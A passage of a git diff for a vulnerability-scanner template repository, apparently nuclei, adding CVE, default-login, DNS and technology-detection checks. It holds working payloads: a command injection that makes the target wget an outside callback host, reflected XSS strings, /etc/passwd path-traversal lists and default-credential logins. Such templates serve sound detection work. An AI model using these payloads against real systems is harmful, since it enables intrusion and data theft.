"
+ condition: and
+
+ - type: word
+ words:
+ - "text/xml"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml
index 3abdd62638..b8984f1cc8 100644
--- a/cves/2021/CVE-2021-35464.yaml
+++ b/cves/2021/CVE-2021-35464.yaml
@@ -31,4 +31,6 @@ requests:
- type: word
words:
- "Version Information -"
- part: body
\ No newline at end of file
+ - "openam/ccversion/Masthead.jsp"
+ part: body
+ condition: or
diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml
new file mode 100644
index 0000000000..f267fd3f68
--- /dev/null
+++ b/cves/2021/CVE-2021-36380.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-36380
+
+info:
+ name: Sunhillo SureLine - Unauthenticated OS Command Injection
+ description: The /cgi/networkDiag.cgi script directly incorporated user-controllable parameters within a shell command, allowing an attacker to manipulate the resulting command by injecting valid OS command input. The following POST request injects a new command that instructs the server to establish a reverse TCP connection to another system, allowing the establishment of an interactive remote shell session.
+ author: gy741
+ severity: critical
+ reference: |
+ - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
+ tags: cve,cve2021,sureline,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /cgi/networkDiag.cgi HTTP/1.1
+ Host: {{Hostname}}
+
+ command=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml
new file mode 100644
index 0000000000..33de2b4095
--- /dev/null
+++ b/cves/2021/CVE-2021-37216.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-37216
+
+info:
+ name: QSAN Storage Manager prior to v3.3.3 Reflected XSS
+ author: dwisiswant0
+ description: |
+ QSAN Storage Manager header page parameters does not filter special characters.
+ Remote attackers can inject JavaScript without logging in and launch
+ reflected XSS attacks to access and modify specific data.
+ reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html
+ severity: medium
+ tags: cve,cve2021,xss,qsan
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/http_header.php"
+ headers:
+ X-Trigger-XSS: ""
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - '"HTTP_X_TRIGGER_XSS":""'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: dsl
+ dsl:
+ - "!contains(tolower(all_headers), 'x-xss-protection')"
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml
new file mode 100644
index 0000000000..6c9c42fe15
--- /dev/null
+++ b/cves/2021/CVE-2021-37573.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-37573
+
+info:
+ name: Tiny Java Web Server - Reflected XSS
+ author: geeknik
+ severity: medium
+ reference:
+ - https://seclists.org/fulldisclosure/2021/Aug/13
+ tags: cve,cve2021,xss,tjws
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 404
+
+ - type: word
+ part: body
+ words:
+ - "404 te
st not found
"
+
+ - type: word
+ part: header
+ words:
+ - text/html
diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml
new file mode 100644
index 0000000000..124362cab5
--- /dev/null
+++ b/cves/2021/CVE-2021-37704.yaml
@@ -0,0 +1,36 @@
+id: CVE-2021-37704
+
+info:
+ name: phpfastcache phpinfo exposure
+ author: whoever
+ severity: low
+ description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache.
+ tags: cve,cve2021,exposure,phpfastcache
+ reference: |
+ https://github.com/PHPSocialNetwork/phpfastcache/pull/813
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php"
+ - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "PHP Extension"
+ - "PHP Version"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - '>PHP Version <\/td>([0-9.]+)'
diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml
new file mode 100644
index 0000000000..c17a52845f
--- /dev/null
+++ b/cves/2021/CVE-2021-38702.yaml
@@ -0,0 +1,29 @@
+id: CVE-2021-38702
+
+info:
+ name: Cyberoam NetGenie XSS
+ author: geeknik
+ severity: medium
+ description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php.
+ reference: https://seclists.org/fulldisclosure/2021/Aug/20
+ tags: cve,cve2021,cyberoam,netgenie,xss,router
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+
+ - type: word
+ words:
+ - "text/html"
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/default-logins/azkaban/azkaban-web-client-default-creds.yaml b/default-logins/azkaban/azkaban-web-client-default-creds.yaml
new file mode 100644
index 0000000000..9d2c161334
--- /dev/null
+++ b/default-logins/azkaban/azkaban-web-client-default-creds.yaml
@@ -0,0 +1,41 @@
+id: azkaban-web-client-default-creds
+
+info:
+ name: Azkaban Web Client Default Credential
+ author: pussycat0x
+ severity: high
+ reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
+ tags: default-login,azkaban
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ action=login&username=admin&password=admin
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"session.id"'
+ - '"success"'
+ condition: and
+
+ - type: word
+ words:
+ - 'azkaban.browser.session.id'
+ - 'application/json'
+ condition: and
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: kval
+ kval:
+ - azkaban.browser.session.id
diff --git a/default-logins/guacamole/guacamole-default-login.yaml b/default-logins/guacamole/guacamole-default-login.yaml
new file mode 100644
index 0000000000..811d0daf45
--- /dev/null
+++ b/default-logins/guacamole/guacamole-default-login.yaml
@@ -0,0 +1,37 @@
+id: guacamole-default-credentials
+
+info:
+ name: Guacamole Default Credentials
+ author: r3dg33k
+ severity: high
+ tags: guacamole,default-login
+ reference: https://wiki.debian.org/Guacamole#:~:text=You%20can%20now%20access%20the,password%20are%20both%20%22guacadmin%22.
+
+requests:
+ - raw:
+ - |
+ POST /api/tokens HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+ Origin: {{Hostname}}
+ Referer: {{Hostname}}
+
+ username=guacadmin&password=guacadmin
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"username"'
+ - '"authToken"'
+ - '"guacadmin"'
+ condition: and
+
+ - type: word
+ words:
+ - 'application/json'
+ part: header
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/default-logins/oracle/oracle-bi-default-credentials.yaml b/default-logins/oracle/oracle-bi-default-credentials.yaml
index 1219ef549f..25da32202d 100644
--- a/default-logins/oracle/oracle-bi-default-credentials.yaml
+++ b/default-logins/oracle/oracle-bi-default-credentials.yaml
@@ -4,7 +4,7 @@ info:
name: Oracle Business Intelligence Default Credentials
author: milo2012
severity: high
- tags: oracle,dlogin
+ tags: oracle,default-login
requests:
- raw:
diff --git a/dns/nameserver-detection.yaml b/dns/can-i-take-over-dns.yaml
similarity index 58%
rename from dns/nameserver-detection.yaml
rename to dns/can-i-take-over-dns.yaml
index 8d2f5c43d3..0c2c3d7052 100644
--- a/dns/nameserver-detection.yaml
+++ b/dns/can-i-take-over-dns.yaml
@@ -1,10 +1,10 @@
-id: nameserver-detection
+id: can-i-take-over-dns
info:
- name: NS Detection
+ name: Can I Take Over DNS - Fingerprint
author: pdteam
severity: info
- tags: dns,ns
+ tags: dns,ns,takeover
reference: https://github.com/indianajson/can-i-take-over-dns
dns:
@@ -41,11 +41,6 @@ dns:
- "ns1.bizland.com"
- "ns2.bizland.com"
- - type: word
- name: cloudflare
- words:
- - "ns.cloudflare.com"
-
- type: word
name: digitalocean
condition: or
@@ -113,13 +108,6 @@ dns:
- "ns1.linode.com"
- "ns1.linode.com"
- - type: word
- name: mediatemple
- condition: or
- words:
- - "ns1.mediatemple.net"
- - "ns2.mediatemple.net"
-
- type: word
name: mydomain
condition: or
@@ -150,83 +138,3 @@ dns:
words:
- "yns1.yahoo.com"
- "yns2.yahoo.com"
-
- - type: word
- name: domainpeople
- condition: or
- words:
- - "ns1.domainpeople.com"
- - "ns2.domainpeople.com"
-
- - type: word
- name: hover
- condition: or
- words:
- - "ns1.hover.com"
- - "ns2.hover.com"
-
- - type: word
- name: networksolutions
- words:
- - ".worldnic.com"
-
- - type: word
- name: activision
- words:
- - ".activision.com"
-
- - type: word
- name: aws-route53
- words:
- - ".awsdns-"
-
- - type: word
- name: apple
- condition: or
- words:
- - "a.ns.apple.com"
- - "b.ns.apple.com"
- - "c.ns.apple.com"
- - "d.ns.apple.com"
-
- - type: word
- name: capitalone
- condition: or
- words:
- - "ns1.capitalone.com"
- - "ns2.capitalone.com"
- - "ns3.capitalone.com"
-
- - type: word
- name: csust
- condition: or
- words:
- - "0xd0a1.csust.netm"
- - "0xd0a2.csust.net"
- - "0xd0a3.csust.net"
- - "0xd0a4.csust.net"
-
- - type: word
- name: disney
- condition: or
- words:
- - "ns1.twdcns.com"
- - "ns2.twdcns.com"
- - "ns3.twdcns.info"
- - "ns4.twdcns.info"
- - "ns5.twdcns.co.uk"
- - "ns6.twdcns.co.uk"
-
- - type: word
- name: lowes
- condition: or
- words:
- - "authns1.lowes.com"
- - "authns2.lowes.com"
-
- - type: word
- name: tmobile
- condition: or
- words:
- - "ns10.tmobileus.com"
- - "ns10.tmobileus.net"
diff --git a/dns/cname-service-detector.yaml b/dns/cname-service-detection.yaml
similarity index 68%
rename from dns/cname-service-detector.yaml
rename to dns/cname-service-detection.yaml
index fe586cd0ce..dea6bbb752 100644
--- a/dns/cname-service-detector.yaml
+++ b/dns/cname-service-detection.yaml
@@ -1,7 +1,7 @@
-id: cname-service-detector
+id: cname-service-detection
info:
- name: 3rd party service checker
+ name: cname service detection
author: pdteam
severity: info
tags: dns
@@ -12,13 +12,20 @@ dns:
class: inet
recursion: true
retries: 5
+
matchers-condition: or
matchers:
- type: word
name: zendesk
words:
- "zendesk.com"
+
- type: word
name: github
words:
- "github.io"
+
+ - type: word
+ name: announcekit
+ words:
+ - "cname.announcekit.app"
\ No newline at end of file
diff --git a/dns/dnssec-detection.yaml b/dns/dnssec-detection.yaml
new file mode 100644
index 0000000000..7c64193c85
--- /dev/null
+++ b/dns/dnssec-detection.yaml
@@ -0,0 +1,22 @@
+id: dnssec-detection
+
+info:
+ name: DNSSEC Detection
+ description: A template to check if Delegation of Signing (DS) record provides information about a signed zone file when DNSSEC enabled.
+ author: pdteam
+ severity: info
+ tags: dns,dnssec
+ reference: https://www.cyberciti.biz/faq/unix-linux-test-and-validate-dnssec-using-dig-command-line/
+
+dns:
+ - name: "{{FQDN}}"
+ type: DS
+ class: inet
+ recursion: true
+ retries: 3
+
+ extractors:
+ - type: regex
+ group: 1
+ regex:
+ - "IN\tDS\t(.+)"
diff --git a/exposed-panels/azkaban-web-client.yaml b/exposed-panels/azkaban-web-client.yaml
new file mode 100644
index 0000000000..8d916af0d2
--- /dev/null
+++ b/exposed-panels/azkaban-web-client.yaml
@@ -0,0 +1,22 @@
+id: azkaban-web-client
+
+info:
+ name: Azkaban Web Client
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
+ tags: panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Azkaban Web Client'
+ - type: status
+ status:
+ - 200
diff --git a/exposed-panels/bazarr-login.yaml b/exposed-panels/bazarr-login.yaml
new file mode 100644
index 0000000000..87b5c39966
--- /dev/null
+++ b/exposed-panels/bazarr-login.yaml
@@ -0,0 +1,18 @@
+id: bazarr-login-detect
+
+info:
+ name: Bazarr Login Detect
+ author: r3dg33k
+ severity: info
+ reference: https://www.bazarr.media/
+ tags: panel,bazarr,login
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/login"
+
+ matchers:
+ - type: word
+ words:
+ - 'Bazarr'
\ No newline at end of file
diff --git a/exposed-panels/camunda-login-panel.yaml b/exposed-panels/camunda-login-panel.yaml
new file mode 100644
index 0000000000..ca5b5f04c2
--- /dev/null
+++ b/exposed-panels/camunda-login-panel.yaml
@@ -0,0 +1,31 @@
+id: camunda-login-panel
+info:
+ name: Camunda Login panel
+ author: alifathi-h1
+ severity: info
+ description: Default Credentials of demo:demo on Camunda application.
+ reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/
+ tags: camunda,panel
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/app/welcome/default/#!/login'
+ - '{{BaseURL}}/camunda/app/welcome/default/#!/login'
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Camunda Welcome"
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - ' | '
diff --git a/technologies/favicon-detection.yaml b/technologies/favicon-detection.yaml
index 7de8ff4337..7394c9fff3 100644
--- a/technologies/favicon-detection.yaml
+++ b/technologies/favicon-detection.yaml
@@ -2553,4 +2553,9 @@ requests:
- type: dsl
name: "KevinLAB"
dsl:
- - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))"
\ No newline at end of file
+ - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))"
+
+ - type: dsl
+ name: "qdPM"
+ dsl:
+ - "status_code==200 && (\"762074255\" == mmh3(base64_py(body)))"
diff --git a/technologies/froxlor-detect.yaml b/technologies/froxlor-detect.yaml
index b3336641ef..a3d3a441ab 100644
--- a/technologies/froxlor-detect.yaml
+++ b/technologies/froxlor-detect.yaml
@@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/"
+ - "{{BaseURL}}"
matchers-condition: and
matchers:
diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml
new file mode 100644
index 0000000000..95ed07e8c1
--- /dev/null
+++ b/technologies/getsimple-cms-detector.yaml
@@ -0,0 +1,22 @@
+id: getsimple-cms-detector
+
+info:
+ name: GetSimple CMS Detector
+ author: philippedelteil
+ severity: info
+ description: With this template we can detect a running GetSimple CMS instance
+ tags: getsimple,tech
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/readme.txt"
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'GetSimple CMS is a flatfile CMS'
+ - type: status
+ part: header
+ status:
+ - 200
diff --git a/technologies/influxdb-detect.yaml b/technologies/influxdb-detect.yaml
new file mode 100644
index 0000000000..7a9538b3aa
--- /dev/null
+++ b/technologies/influxdb-detect.yaml
@@ -0,0 +1,24 @@
+id: influxdb-detect
+
+info:
+ name: InfluxDB Detect
+ author: pikpikcu
+ severity: info
+ tags: tech,influxdb
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "InfluxDB - Admin Interface"
+
+ - type: status
+ status:
+ - 200
diff --git a/technologies/jellyfin-detect.yaml b/technologies/jellyfin-detect.yaml
index 1bfacb6260..ae031c20ca 100644
--- a/technologies/jellyfin-detect.yaml
+++ b/technologies/jellyfin-detect.yaml
@@ -12,14 +12,16 @@ requests:
- "{{BaseURL}}/web/home.html"
- "{{BaseURL}}/index.html"
- "{{BaseURL}}/web/index.html"
+ - "{{BaseURL}}/web/manifest.json"
matchers-condition: and
matchers:
- type: word
words:
- "name=\"application-name\" content=\"Jellyfin\""
- "class=\"page homePage libraryPage allLibraryPage backdropPage pageWithAbsoluteTabs withTabs\""
+ - "The Free Software Media System"
condition: or
part: body
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml
index 721bac1466..a0fd837d44 100644
--- a/technologies/node-red-detect.yaml
+++ b/technologies/node-red-detect.yaml
@@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/"
+ - "{{BaseURL}}"
matchers-condition: and
matchers:
diff --git a/technologies/oneblog-detect.yaml b/technologies/oneblog-detect.yaml
new file mode 100644
index 0000000000..72fa47957b
--- /dev/null
+++ b/technologies/oneblog-detect.yaml
@@ -0,0 +1,24 @@
+id: oneblog-detect
+
+info:
+ name: OneBlog Detect
+ author: pikpikcu
+ severity: info
+ tags: tech,oneblog
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/passport/login/"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ part: body
+ words:
+ - "OneBlog开源博客后台管理系统"
+
+ - type: status
+ status:
+ - 200
diff --git a/technologies/opensis-detect.yaml b/technologies/opensis-detect.yaml
new file mode 100644
index 0000000000..369162c9c1
--- /dev/null
+++ b/technologies/opensis-detect.yaml
@@ -0,0 +1,24 @@
+id: opensis-detect
+
+info:
+ name: OpenSIS Detect
+ author: pikpikcu
+ severity: info
+ tags: tech,opensis
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ - "{{BaseURL}}/opensis/index.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "openSIS Student Information System"
+
+ - type: status
+ status:
+ - 200
diff --git a/technologies/openx-detect.yaml b/technologies/openx-detect.yaml
index 1f43024105..9d76d1fab6 100644
--- a/technologies/openx-detect.yaml
+++ b/technologies/openx-detect.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "{{BaseURL}}/www/admin/"
+ matchers-condition: and
matchers:
- type: regex
part: body
diff --git a/technologies/operations-automation-default-page.yaml b/technologies/operations-automation-default-page.yaml
new file mode 100644
index 0000000000..1a53b9bd61
--- /dev/null
+++ b/technologies/operations-automation-default-page.yaml
@@ -0,0 +1,23 @@
+id: operations-automation-default-page
+
+info:
+ name: Operations Automation Default Page
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
+ tags: tech,default
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Operations Automation Default Page'
+
+ - type: status
+ status:
+ - 200
diff --git a/technologies/sceditor-detect.yaml b/technologies/sceditor-detect.yaml
index 1ce4bcf978..d9b323edea 100644
--- a/technologies/sceditor-detect.yaml
+++ b/technologies/sceditor-detect.yaml
@@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/"
+ - "{{BaseURL}}"
matchers-condition: and
matchers:
diff --git a/technologies/tech-detect.yaml b/technologies/tech-detect.yaml
index f4664802dc..606897c22a 100644
--- a/technologies/tech-detect.yaml
+++ b/technologies/tech-detect.yaml
@@ -2931,13 +2931,6 @@ requests:
condition: or
part: body
-
- - type: word
- name: apache
- words:
- - "Apache"
- part: header
-
- type: word
name: lighttpd
words:
diff --git a/technologies/thinkcmf-detection.yaml b/technologies/thinkcmf-detection.yaml
index 40557f30ff..6cc404174d 100644
--- a/technologies/thinkcmf-detection.yaml
+++ b/technologies/thinkcmf-detection.yaml
@@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/"
+ - "{{BaseURL}}"
matchers-condition: and
matchers:
diff --git a/technologies/wondercms-detect.yaml b/technologies/wondercms-detect.yaml
index 9a84fa7999..b244d32945 100644
--- a/technologies/wondercms-detect.yaml
+++ b/technologies/wondercms-detect.yaml
@@ -9,7 +9,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/"
+ - "{{BaseURL}}"
matchers-condition: and
matchers:
diff --git a/technologies/wordpress-gotmls-detect.yaml b/technologies/wordpress-gotmls-detect.yaml
new file mode 100644
index 0000000000..5abe70955b
--- /dev/null
+++ b/technologies/wordpress-gotmls-detect.yaml
@@ -0,0 +1,30 @@
+id: wordpress-gotmls-detect
+
+info:
+ name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall
+ author: vsh00t
+ reference: https://www.exploit-db.com/exploits/50107
+ severity: info
+ tags: wordpress,wp-plugin,gotmls
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "gotmls"
+ part: header
+
+ - type: status
+ status:
+ - 302
+
+ extractors:
+ - type: kval
+ part: header
+ kval:
+ - Location
diff --git a/technologies/wso2-apimanager-detect.yaml b/technologies/wso2-apimanager-detect.yaml
new file mode 100644
index 0000000000..3008bde941
--- /dev/null
+++ b/technologies/wso2-apimanager-detect.yaml
@@ -0,0 +1,23 @@
+id: wso2-apimanager-detect
+
+info:
+ name: WSO2 API Manager detect
+ author: righettod
+ severity: info
+ description: Try to detect the presence of a WSO2 API Manager instance via the version endpoint
+ tags: tech,wso2,api-manager
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/services/Version"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "version.services.core.carbon.wso2.org"
+
+ - type: status
+ status:
+ - 200
diff --git a/technologies/yapi-detect.yaml b/technologies/yapi-detect.yaml
index fb38ed2157..77facc8b00 100644
--- a/technologies/yapi-detect.yaml
+++ b/technologies/yapi-detect.yaml
@@ -9,8 +9,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/"
- - "{{BaseURL}}:3000"
+ - "{{BaseURL}}"
matchers-condition: and
matchers:
diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml
index 9dfc748b75..dfe9936edd 100644
--- a/vulnerabilities/apache/apache-solr-file-read.yaml
+++ b/vulnerabilities/apache/apache-solr-file-read.yaml
@@ -24,18 +24,21 @@ requests:
Accept-Language: en
Connection: close
+
extractors:
- type: regex
- regex:
- - '"status"\:\{"(.*?)"\:\{"name"'
+ internal: true
name: core
group: 1
- internal: true
+ regex:
+ - '"name"\:"(.*?)"'
- req-condition: true
+ matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - 'status_code_2 == 200'
- - 'regex("root:.*:0:0:", body_2)'
- condition: and
\ No newline at end of file
+ - type: status
+ status:
+ - 200
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
\ No newline at end of file
diff --git a/vulnerabilities/generic/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml
index a224186e83..b8b4c8044e 100644
--- a/vulnerabilities/generic/basic-cors.yaml
+++ b/vulnerabilities/generic/basic-cors.yaml
@@ -4,7 +4,7 @@ info:
name: Basic CORS misconfiguration
author: nadino
severity: info
- tags: cors
+ tags: cors,generic
requests:
- method: GET
diff --git a/vulnerabilities/generic/basic-xss-prober.yaml b/vulnerabilities/generic/basic-xss-prober.yaml
index 373c1235b5..e1a7c5b60a 100644
--- a/vulnerabilities/generic/basic-xss-prober.yaml
+++ b/vulnerabilities/generic/basic-xss-prober.yaml
@@ -4,7 +4,7 @@ info:
name: Basic XSS Prober
author: nadino,geeknik
severity: low
- tags: xss
+ tags: xss,generic
# Basic XSS prober
# Manual testing needed for exploitation
@@ -28,4 +28,4 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 54b77cfbe3..7b9022bf80 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -7,7 +7,7 @@ info:
reference:
- https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
- https://portswigger.net/research/practical-web-cache-poisoning
- tags: cache
+ tags: cache,generic
requests:
- raw:
diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml
index 7d7fe29698..262f9ca437 100644
--- a/vulnerabilities/generic/crlf-injection.yaml
+++ b/vulnerabilities/generic/crlf-injection.yaml
@@ -5,7 +5,7 @@ info:
author: melbadry9,nadino,xElkomy
severity: low
description: Improper sanitization of CRLF sequences.
- tags: crlf
+ tags: crlf,generic
requests:
- method: GET
diff --git a/vulnerabilities/generic/error-based-sql-injection.yaml b/vulnerabilities/generic/error-based-sql-injection.yaml
index 78257140e3..c0119a2e3c 100644
--- a/vulnerabilities/generic/error-based-sql-injection.yaml
+++ b/vulnerabilities/generic/error-based-sql-injection.yaml
@@ -5,7 +5,7 @@ info:
author: geeknik
severity: high
description: Detects the possibility of SQL injection in 29 database engines. Inspired by https://github.com/sqlmapproject/sqlmap/blob/master/data/xml/errors.xml.
- tags: sqli
+ tags: sqli,generic
requests:
- method: GET
diff --git a/fuzzing/generic-lfi-fuzzing.yaml b/vulnerabilities/generic/generic-linux-lfi.yaml
similarity index 76%
rename from fuzzing/generic-lfi-fuzzing.yaml
rename to vulnerabilities/generic/generic-linux-lfi.yaml
index e73b9d0496..a90cca9492 100644
--- a/fuzzing/generic-lfi-fuzzing.yaml
+++ b/vulnerabilities/generic/generic-linux-lfi.yaml
@@ -1,10 +1,11 @@
-id: generic-lfi-fuzzing
+id: generic-linux-lfi
+
info:
- name: Generic LFI Test
- author: geeknik,unstabl3
+ name: Generic Linux based LFI Test
+ author: geeknik,unstabl3,pentest_swissky,sushantkamble
severity: high
- description: A generic test for Local File Inclusion
- tags: fuzz,lfi
+ description: Searches for /etc/passwd on passed URLs
+ tags: linux,lfi,generic
requests:
- method: GET
@@ -19,6 +20,31 @@ requests:
- "{{BaseURL}}/?q=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&s=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&search=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&id=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&action=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keyword=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&query=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&keywords=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&url=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&view=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&cat=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&name=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&key=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd&p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "{{BaseURL}}/?q=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&s=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&search=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&id=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&action=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keyword=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&query=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&keywords=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&url=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&view=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&cat=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&name=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&key=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd&p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd"
- "{{BaseURL}}/etc/passwd"
+ - "{{BaseURL}}/..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5c..%5cetc/passwd"
+ - "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5cetc/passwd"
